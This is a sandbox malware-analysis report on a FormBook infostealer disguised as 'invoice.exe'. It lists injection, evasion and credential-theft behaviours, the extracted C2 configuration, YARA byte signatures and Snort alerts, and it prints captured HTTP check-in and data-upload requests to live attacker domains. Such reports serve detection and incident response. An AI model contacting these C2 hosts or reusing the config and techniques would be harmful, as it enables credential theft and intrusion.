Edit tour

Windows Analysis Report
invoice.exe

Overview

General Information

Sample Name:	invoice.exe
Analysis ID:	723910
MD5:	6cb9c745dfa97e0e9c7f3c2cdefea36e
SHA1:	eb3e0a31eee4d3292f437a6894bf10742c5b9544
SHA256:	80315ef282c51636b3a9e174de8482d1bab51e044cba0b2cb915d7e48a551b64
Tags:	exeformbook
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Yara detected AntiVM3

System process connects to network (likely due to code injection or exploit)

Snort IDS alert for network traffic

Sample uses process hollowing technique

Tries to steal Mail credentials (via file / registry access)

Maps a DLL or memory area into another process

Initial sample is a PE file and has a suspicious name

Writes to foreign memory regions

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Performs DNS queries to domains with low reputation

Injects a PE file into a foreign processes

Yara detected Generic Downloader

Queues an APC in another process (thread injection)

.NET source code contains very large strings

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Contains long sleeps (>= 3 min)

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

invoice.exe (PID: 1784 cmdline: C:\Users\user\Desktop\invoice.exe MD5: 6CB9C745DFA97E0E9C7F3C2CDEFEA36E)

RegSvcs.exe (PID: 5440 cmdline: {path} MD5: 2867A3817C9245F7CF518524DFD18F28)

explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

msiexec.exe (PID: 5196 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.hotelarta.cloud/dj6o/"], "decoy": ["eHTcR+KSbIHKrEJYcaqomJrw", "d4CQy4B84xPiXuPwHUtF", "8eIkbHEq+BPxberwHUtF", "m0+kGJZPG1H1jgngcA==", "AMbXEsJxX4/J80MD", "cxBd6axquGelQQc=", "J9URjF0q/TbJ80MD", "HxxYujs6bp7dberwHUtF", "VhwjWCuW1Xau", "Hs4ZrXYwBycFVX7hJpekXd1oRg==", "XyAqZOXgWECQBQ==", "H+HaBrNXMlQ5j+GkDTwf7dEalRSG8g==", "Kvj6PwPvL2f1jgngcA==", "q3F0mzHxjbyi", "G/sniBrf1waZ08/yTxyN8qLm", "9uD0ZBYgb5ZiuP3wHUtF", "Ndkqiyj14RhyZziD6WwV4O8=", "PuY9wEs6hMAOTUs2mUCtdjzUeRyb+A==", "PwsHXAKokKjJ80MD", "xa4YnG9AI0WKthDfFO0=", "MQ8MH62d8yYM76ur+PSq1rv4", "3bzBJcCw7xdiv6jgTRiI8E6SoqA=", "gllski02plO4hezwHUtF", "fFupcJ7vWECQBQ==", "t6rT74IzHwBjQg/PFfJ+XkwUqbyJ5R0=", "56Sm6qNmn1DQ0GlhvXvBC8S/VqKP", "WUlz+MBsMUUotVBYcaqomJrw", "byiB84SNALIdtosIbQ==", "Tl6H0INUQnheJvdAtTwA8vY=", "AqzubjoPnUI=", "pjxDfDsybJ4Evov1Zw==", "MAQDK8y6Gb0I8vGtGwxpvjK2JAGH", "UO5BqmVqz165KziylGwV4O8=", "47b4ZydnxKzyMwE=", "Bf7i1stH8J4Hvov1Zw==", "tK7qfS7XseFCG6OY3GwV4O8=", "p7cCavm6qOBKr71GbhlsLg==", "0bXQHb94wGTx++0ubw==", "t46Y0lNYob2TEONj2nnu4vA=", "gkCQBL5zSXzPIzOm/2M+jjzEWfA+cYlv5g==", "Kzh59Yh31ILszGVWratKal6xHAOH", "BLr9ZQYBWbxKmbIgLtHALA==", "VlyjEKNUSG6hcUoFandY", "H/INXiD4y/bdLYKCq/LdOw==", "f01NhTwlcqR+CogrfHrHtan3", "V6baC439Psa1", "t6uu52heoTqUcvDwHUtF", "bXDKLuDkj/MmnzHyQ1Qp7b2/VqKP", "kFa9Hr2GVXzP1qfEwpH66PI=", "hFlcmTAgXE26HA==", "85LuilH7N+c6mufwHUtF", "9Mjd/JJR6hbo8fQjZg==", "SkA7YPrxX12JbRo=", "2fZDwaBN5E+tBw==", "VlSNGsrK/95sfUVy24flta+6Ioi43B32", "CLjlLea4n8MLvov1Zw==", "S02ihrc5x/C6", "gGV6xWcvWECQBQ==", "EcQcUtKDg91tUQ4=", "YQpcvUdGvKPaHg==", "YQhIzXwraFg/LwQ=", "pJbkcPbqSzli0jIB", "x3zE9noxWECQBQ==", "b1pvqkHtG0wdjQv4Vz+4h06SoqA="]}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
invoice.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.376676313.0000000000940000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6611:$a1: 3C 30 50 4F 53 54 74 09 40 0xa99f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000C.00000002.502342628.0000000000320000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000C.00000002.502342628.0000000000320000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6611:$a1: 3C 30 50 4F 53 54 74 09 40 0x1f2a0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa99f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x17ed7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000C.00000002.502342628.0000000000320000.00000040.00000001.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x17cd5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x17781:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x17dd7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x17f4f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x169cc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1def7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1f00a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000C.00000002.502342628.0000000000320000.00000040.00000001.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1a1d9:$sqlite3step: 68 34 1C 7B E1 0x1ad51:$sqlite3step: 68 34 1C 7B E1 0x1a21b:$sqlite3text: 68 38 2A 90 C5 0x1ad96:$sqlite3text: 68 38 2A 90 C5 0x1a232:$sqlite3blob: 68 53 D8 7F 8C 0x1adac:$sqlite3blob: 68 53 D8 7F 8C
0000000C.00000002.506833104.0000000000980000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000C.00000002.506833104.0000000000980000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6611:$a1: 3C 30 50 4F 53 54 74 09 40 0x1f2a0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa99f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x17ed7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000C.00000002.506833104.0000000000980000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x17cd5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x17781:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x17dd7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x17f4f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x169cc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1def7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1f00a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000C.00000002.506833104.0000000000980000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1a1d9:$sqlite3step: 68 34 1C 7B E1 0x1ad51:$sqlite3step: 68 34 1C 7B E1 0x1a21b:$sqlite3text: 68 38 2A 90 C5 0x1ad96:$sqlite3text: 68 38 2A 90 C5 0x1a232:$sqlite3blob: 68 53 D8 7F 8C 0x1adac:$sqlite3blob: 68 53 D8 7F 8C
0000000C.00000002.503273136.0000000000750000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000C.00000002.503273136.0000000000750000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6611:$a1: 3C 30 50 4F 53 54 74 09 40 0x1f2a0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa99f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x17ed7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000C.00000002.503273136.0000000000750000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x17cd5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x17781:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x17dd7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x17f4f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x169cc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1def7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1f00a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000C.00000002.503273136.0000000000750000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1a1d9:$sqlite3step: 68 34 1C 7B E1 0x1ad51:$sqlite3step: 68 34 1C 7B E1 0x1a21b:$sqlite3text: 68 38 2A 90 C5 0x1ad96:$sqlite3text: 68 38 2A 90 C5 0x1a232:$sqlite3blob: 68 53 D8 7F 8C 0x1adac:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.376302606.0000000000401000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.376302606.0000000000401000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6d48:$a1: 3C 30 50 4F 53 54 74 09 40 0x1f9d7:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xb0d6:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x1860e:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000001.00000002.376302606.0000000000401000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x1840c:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x17eb8:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x1850e:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x18686:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xaca1:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x17103:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1e62e:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1f741:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.376302606.0000000000401000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1a910:$sqlite3step: 68 34 1C 7B E1 0x1b488:$sqlite3step: 68 34 1C 7B E1 0x1a952:$sqlite3text: 68 38 2A 90 C5 0x1b4cd:$sqlite3text: 68 38 2A 90 C5 0x1a969:$sqlite3blob: 68 53 D8 7F 8C 0x1b4e3:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000000.347542023.0000000010363000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000000.347542023.0000000010363000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x102a0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x8ed7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000002.00000000.347542023.0000000010363000.00000040.00000001.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8cd5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x8781:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x8dd7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x8f4f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x79cc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xeef7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1000a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000000.347542023.0000000010363000.00000040.00000001.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0xb1d9:$sqlite3step: 68 34 1C 7B E1 0xbd51:$sqlite3step: 68 34 1C 7B E1 0xb21b:$sqlite3text: 68 38 2A 90 C5 0xbd96:$sqlite3text: 68 38 2A 90 C5 0xb232:$sqlite3blob: 68 53 D8 7F 8C 0xbdac:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: invoice.exe PID: 1784	SUSP_Reversed_Base64_Encoded_EXE	Detects an base64 encoded executable with reversed characters	Florian Roth	0x44bde:$s5: AEAAAAMAAQqVT 0x67937:$s5: AEAAAAMAAQqVT 0x678a8:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
Process Memory Space: invoice.exe PID: 1784	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RegSvcs.exe PID: 5440	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5709c:$a1: 3C 30 50 4F 53 54 74 09 40 0x11f762:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: msiexec.exe PID: 5196	Windows_Trojan_Formbook_1112e116	unknown	unknown	0xe512c:$a1: 3C 30 50 4F 53 54 74 09 40 0x15408c:$a1: 3C 30 50 4F 53 54 74 09 40
Click to see the 20 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.invoice.exe.310000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security

Snort Signatures

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.3 - Destination IP: 35.241.57.73

Timestamp:	192.168.2.335.241.57.7349702802031449 10/16/22-05:30:57.590800
SID:	2031449
Source Port:	49702
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.3 - Destination IP: 35.241.57.73

Timestamp:	192.168.2.335.241.57.7349702802031412 10/16/22-05:30:57.590800
SID:	2031412
Source Port:	49702
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.3 - Destination IP: 35.241.57.73

Timestamp:	192.168.2.335.241.57.7349702802031453 10/16/22-05:30:57.590800
SID:	2031453
Source Port:	49702
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: invoice.exe	ReversingLabs: Detection: 45%
Source: invoice.exe	Virustotal: Detection: 36%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 0000000C.00000002.502342628.0000000000320000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.506833104.0000000000980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.503273136.0000000000750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.376302606.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.347542023.0000000010363000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: 0000000C.00000002.502342628.0000000000320000.00000040.00000001.00040000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.hotelarta.cloud/dj6o/"], "decoy": ["eHTcR+KSbIHKrEJYcaqomJrw", "d4CQy4B84xPiXuPwHUtF", "8eIkbHEq+BPxberwHUtF", "m0+kGJZPG1H1jgngcA==", "AMbXEsJxX4/J80MD", "cxBd6axquGelQQc=", "J9URjF0q/TbJ80MD", "HxxYujs6bp7dberwHUtF", "VhwjWCuW1Xau", "Hs4ZrXYwBycFVX7hJpekXd1oRg==", "XyAqZOXgWECQBQ==", "H+HaBrNXMlQ5j+GkDTwf7dEalRSG8g==", "Kvj6PwPvL2f1jgngcA==", "q3F0mzHxjbyi", "G/sniBrf1waZ08/yTxyN8qLm", "9uD0ZBYgb5ZiuP3wHUtF", "Ndkqiyj14RhyZziD6WwV4O8=", "PuY9wEs6hMAOTUs2mUCtdjzUeRyb+A==", "PwsHXAKokKjJ80MD", "xa4YnG9AI0WKthDfFO0=", "MQ8MH62d8yYM76ur+PSq1rv4", "3bzBJcCw7xdiv6jgTRiI8E6SoqA=", "gllski02plO4hezwHUtF", "fFupcJ7vWECQBQ==", "t6rT74IzHwBjQg/PFfJ+XkwUqbyJ5R0=", "56Sm6qNmn1DQ0GlhvXvBC8S/VqKP", "WUlz+MBsMUUotVBYcaqomJrw", "byiB84SNALIdtosIbQ==", "Tl6H0INUQnheJvdAtTwA8vY=", "AqzubjoPnUI=", "pjxDfDsybJ4Evov1Zw==", "MAQDK8y6Gb0I8vGtGwxpvjK2JAGH", "UO5BqmVqz165KziylGwV4O8=", "47b4ZydnxKzyMwE=", "Bf7i1stH8J4Hvov1Zw==", "tK7qfS7XseFCG6OY3GwV4O8=", "p7cCavm6qOBKr71GbhlsLg==", "0bXQHb94wGTx++0ubw==", "t46Y0lNYob2TEONj2nnu4vA=", "gkCQBL5zSXzPIzOm/2M+jjzEWfA+cYlv5g==", "Kzh59Yh31ILszGVWratKal6xHAOH", "BLr9ZQYBWbxKmbIgLtHALA==", "VlyjEKNUSG6hcUoFandY", "H/INXiD4y/bdLYKCq/LdOw==", "f01NhTwlcqR+CogrfHrHtan3", "V6baC439Psa1", "t6uu52heoTqUcvDwHUtF", "bXDKLuDkj/MmnzHyQ1Qp7b2/VqKP", "kFa9Hr2GVXzP1qfEwpH66PI=", "hFlcmTAgXE26HA==", "85LuilH7N+c6mufwHUtF", "9Mjd/JJR6hbo8fQjZg==", "SkA7YPrxX12JbRo=", "2fZDwaBN5E+tBw==", "VlSNGsrK/95sfUVy24flta+6Ioi43B32", "CLjlLea4n8MLvov1Zw==", "S02ihrc5x/C6", "gGV6xWcvWECQBQ==", "EcQcUtKDg91tUQ4=", "YQpcvUdGvKPaHg==", "YQhIzXwraFg/LwQ=", "pJbkcPbqSzli0jIB", "x3zE9noxWECQBQ==", "b1pvqkHtG0wdjQv4Vz+4h06SoqA="]}

Source: invoice.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: invoice.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: msiexec.pdb source: RegSvcs.exe, 00000001.00000002.376914799.0000000000B59000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.376985555.0000000000B6A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: msiexec.pdbGCTL source: RegSvcs.exe, 00000001.00000002.376914799.0000000000B59000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.376985555.0000000000B6A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Qho2.pdbSHA256 source: invoice.exe
Source:	Binary string: RegSvcs.pdb, source: msiexec.exe, 0000000C.00000002.504978888.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.509860185.0000000004943000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000001.00000003.269129570.0000000000C5C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000003.276647128.0000000000DFB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.378804122.0000000004460000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.509339278.000000000471F000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.376488856.00000000042C6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.507517182.0000000004600000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000001.00000003.269129570.0000000000C5C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000003.276647128.0000000000DFB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.378804122.0000000004460000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.509339278.000000000471F000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.376488856.00000000042C6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.507517182.0000000004600000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: Qho2.pdb source: invoice.exe
Source:	Binary string: RegSvcs.pdb source: msiexec.exe, 0000000C.00000002.504978888.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.509860185.0000000004943000.00000004.10000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\invoice.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	0_2_025636B0
Source: C:\Users\user\Desktop\invoice.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	0_2_02565270
Source: C:\Users\user\Desktop\invoice.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	0_2_025636A9

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 35.241.57.73 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.53kzl.xyz
Source: C:\Windows\explorer.exe	Network Connect: 64.190.62.22 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.soft-r.pro
Source: C:\Windows\explorer.exe	Domain query: www.bunniesfor-sales.site
Source: C:\Windows\explorer.exe	Network Connect: 194.58.112.174 80	Jump to behavior

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49702 -> 35.241.57.73:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49702 -> 35.241.57.73:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49702 -> 35.241.57.73:80

Performs DNS queries to domains with low reputation

Source: C:\Windows\explorer.exe

DNS query: www.53kzl.xyz

Yara detected Generic Downloader

Source: Yara match	File source: invoice.exe, type: SAMPLE
Source: Yara match	File source: 0.0.invoice.exe.310000.0.unpack, type: UNPACKEDPE

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.hotelarta.cloud/dj6o/

Source: Joe Sandbox View	ASN Name: NBS11696US NBS11696US
Source: Joe Sandbox View	ASN Name: AS-REGRU AS-REGRU

Source: global traffic	HTTP traffic detected: GET /dj6o/?7n9pqx=K2Mp5pqx32_lRZL&tVw=NMTOyXsc8ePY2MKPEps/R25z0YSV56yvdacE+LTNH3L/G6DIQ9NvLR18puwfz5ktIQRwsxKrERsH/7mcoV+cyDukUw1T3fVygQ== HTTP/1.1Host: www.bunniesfor-sales.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dj6o/?tVw=h04kayJb3ljXRQcX7vvRWSjXbEa8Wdd7FpeJSrMka0q/M3vTEVv/IaMbJiFl7sx9hbZGfk4FCy3OyfUPlJlZw4D92suLIakcOQ==&7n9pqx=K2Mp5pqx32_lRZL HTTP/1.1Host: www.53kzl.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dj6o/?7n9pqx=K2Mp5pqx32_lRZL&tVw=vnB24m7zYuqz1tM6+OXGectY250cZexgkvx801FyUM6ApfRgmaMK0bHsyxLM1s80XjTXf2isqV5CX5YJjqjmDhpmcD58xmf+Uw== HTTP/1.1Host: www.soft-r.proConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 64.190.62.22 64.190.62.22

Source: global traffic	HTTP traffic detected: POST /dj6o/ HTTP/1.1Host: www.53kzl.xyzConnection: closeContent-Length: 185Cache-Control: no-cacheOrigin: http://www.53kzl.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.53kzl.xyz/dj6o/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 74 56 77 3d 73 32 51 45 5a 43 70 76 28 43 4c 59 57 6a 34 52 71 74 33 64 4c 7a 61 6e 48 6d 65 4a 54 4f 6b 73 45 61 43 33 52 5a 49 69 4d 6b 50 4c 45 67 4c 78 4b 55 4c 49 4c 61 77 34 47 6c 52 70 78 64 70 75 37 5a 6f 6b 64 6b 49 6d 4a 48 33 63 31 74 51 4e 6c 4a 78 4c 73 35 50 38 33 2d 4c 77 4e 4e 4d 70 56 4d 72 63 35 7a 43 63 66 41 4f 30 4c 77 32 59 4d 57 37 73 64 31 4b 56 4d 44 55 54 64 72 63 6b 48 5a 41 6a 49 44 65 33 6e 53 33 63 4d 4f 49 2d 54 54 7a 37 61 63 79 67 44 49 53 37 28 30 4f 42 66 70 4e 6b 30 77 49 50 56 38 50 39 56 33 45 57 38 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: tVw=s2QEZCpv(CLYWj4Rqt3dLzanHmeJTOksEaC3RZIiMkPLEgLxKULILaw4GlRpxdpu7ZokdkImJH3c1tQNlJxLs5P83-LwNNMpVMrc5zCcfAO0Lw2YMW7sd1KVMDUTdrckHZAjIDe3nS3cMOI-TTz7acygDIS7(0OBfpNk0wIPV8P9V3EW8w).
